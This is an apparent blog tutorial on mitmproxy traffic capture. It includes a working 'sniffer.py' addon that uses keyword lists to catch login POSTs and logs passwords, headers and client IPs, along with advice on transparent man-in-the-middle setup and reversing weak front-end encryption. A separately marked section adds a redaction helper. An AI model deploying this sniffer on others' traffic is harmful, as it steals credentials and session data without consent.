It has been a long time since I wrote an article: partly because I have been busy, partly because I almost forgot about it. This should be the last post of the year! Today I want to talk about some of my recent practice with network packet capture (I actually know very little about the field of network security). The tool you are probably most familiar with is Wireshark, which is quite powerful. However, it does not really support hot-plugging custom logic, so it cannot fully control how packets are captured. Soon after, mitmproxy came into my sight: with it, custom capture logic can be added as a Python script, so it is very easy to extend and solved my needs perfectly. This is another example of putting this silly programming language into production after writing Keykee.
I suddenly remembered a realization of my two years in this field:
Programmers should sometimes be grateful to people who provide them with requirements.
mitmdump is the command-line variant of mitmproxy and the core tool for dumping traffic according to custom scripts. If you only want to play on your own machine, use regular mode. A detailed description of the mitmproxy modes can be found in the official documentation. Here is a schematic of regular mode:
If a man-in-the-middle setup is involved, it must be combined with Linux ip_forward and mitmdump transparent mode, which is invisible to the client:
In general, the conventional and transparent modes satisfy most of the experimental requirements.
mitmdump can be installed via pip:

```
$ pip install mitmproxy
```
Once installed, the mitmdump command can be run from anywhere.
To capture HTTPS requests, import the mitmproxy root certificate into the system trust store (or into a browser). By default the certificate is generated in ~/.mitmproxy.
Then set the system network proxy, enabling "Use the same proxy for all protocols" as required, with proxy address 127.0.0.1 and proxy port 8080.
With that, the preparations are complete.
As a first attempt I wrote a password-sniffing script; as mentioned above, the tool is very extensible, so I will just drop the script here.
sniffer.py

```python
import logging
from mitmproxy import http

# Substrings that suggest a form field carries a credential.
password_key = ["password", "pwd", "pass", "passwd", "mm", "passport", "auth", "key", "mima"]
# Substrings that suggest a URL is a login endpoint.
form_login_key = ["check", "login", "verify", "account", "logon", "signin", "denglu"]


class Sniffer:
    def request(self, flow: http.HTTPFlow):
        request = flow.request
        url = request.pretty_url
        form_url = str(request.urlencoded_form)
        # Only POSTs whose URL looks like a login endpoint or whose
        # form contains a password-like field name are resolved.
        if request.method == 'POST':
            if self.any_match(form_login_key, url) or self.any_match(password_key, form_url):
                self.resolve(flow)

    def any_match(self, keywords, text: str):
        # Case-insensitive substring match against each keyword.
        lower_text = text.lower()
        for i in keywords:
            if i in lower_text:
                return True
        return False

    def resolve(self, flow: http.HTTPFlow):
        request = flow.request
        url = request.url
        _from = str(flow.client_conn.ip_address)
        url_form = str(request.urlencoded_form)
        header = str(request.headers)
        logging.info("url: %s \nheader: %s \nform: %s \nip_from: %s", url, header, url_form, _from)
```
mitmdump creates an instance of the Sniffer class and calls its request(flow) method for every request. Several such classes can be loaded at once through a single entry file:
addons.py

```python
from sniffer import Sniffer

# mitmdump loads every addon listed here.
addons = [
    Sniffer(),
    # YourSniffer(),
    # ...
]
```
Finally, run the mitmdump command to capture packets:
```
$ mitmdump -q -s addons.py --set body-size-limit=10k "~m post"
```
- `-q`: quiets mitmdump's own console output so that only the logs from your script are shown
- `-s`: the entry script file
- `--set body-size-limit=10k`: only handle requests whose body is smaller than 10k
- `"~m post"`: a filter expression that processes only POST requests
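As an added example (not part of the original post or of mitmproxy), the matching rule of the script above is rewritten as plain functions with no mitmproxy dependency so it can be unit-tested offline, and a `redact_form()` helper masks credential values before anything reaches a log, so the capture can show which fields a login sends without storing the secrets themselves. Function names and the sample form body are my own constructions.

```python
from urllib.parse import parse_qsl

# Same keyword lists as sniffer.py (assumed unchanged).
PASSWORD_KEYS = ["password", "pwd", "pass", "passwd", "mm", "passport", "auth", "key", "mima"]
FORM_LOGIN_KEYS = ["check", "login", "verify", "account", "logon", "signin", "denglu"]


def any_match(keywords, text):
    """True if any keyword occurs, case-insensitively, anywhere in text."""
    lower = text.lower()
    return any(k in lower for k in keywords)


def is_login_post(method, url, body):
    """Same trigger as the Sniffer addon: a POST whose URL looks like a
    login endpoint, or whose urlencoded body mentions a password-like key."""
    if method.upper() != "POST":
        return False
    return any_match(FORM_LOGIN_KEYS, url) or any_match(PASSWORD_KEYS, body)


def mask(value, keep=2):
    """Keep the first `keep` characters and replace the rest with '*'."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def redact_form(body):
    """Parse a urlencoded body into a dict, masking values whose field
    name matches a password-like keyword (e.g. 'password', 'passwd')."""
    redacted = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        redacted[name] = mask(value) if any_match(PASSWORD_KEYS, name) else value
    return redacted


def format_log_line(src_ip, url, body):
    """One log line per login-like POST with secrets already masked."""
    fields = ", ".join(f"{k}={v}" for k, v in redact_form(body).items())
    return f"login-like POST from {src_ip} to {url}: {fields}"


if __name__ == "__main__":
    # Constructed sample request, not captured traffic.
    sample = ("POST", "https://example.test/api", "user=bob&password=hunter2")
    if is_login_post(*sample):
        print(format_log_line("127.0.0.1", sample[1], sample[2]))
```

Note that the keyword lists match substrings, so a field such as `keyword` or `author` is also masked; that errs on the side of hiding too much, which is the safer default for logs.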
After launching, visit a site with relatively weak security and perform a user login; the username, password and other fields then appear in the console. If they are encrypted, look at the page's front-end code to work out the encryption scheme, which is easy to follow on a poorly secured site.
Finally, welcome to my prince’s cabin!
Dear friends, happy New Year:)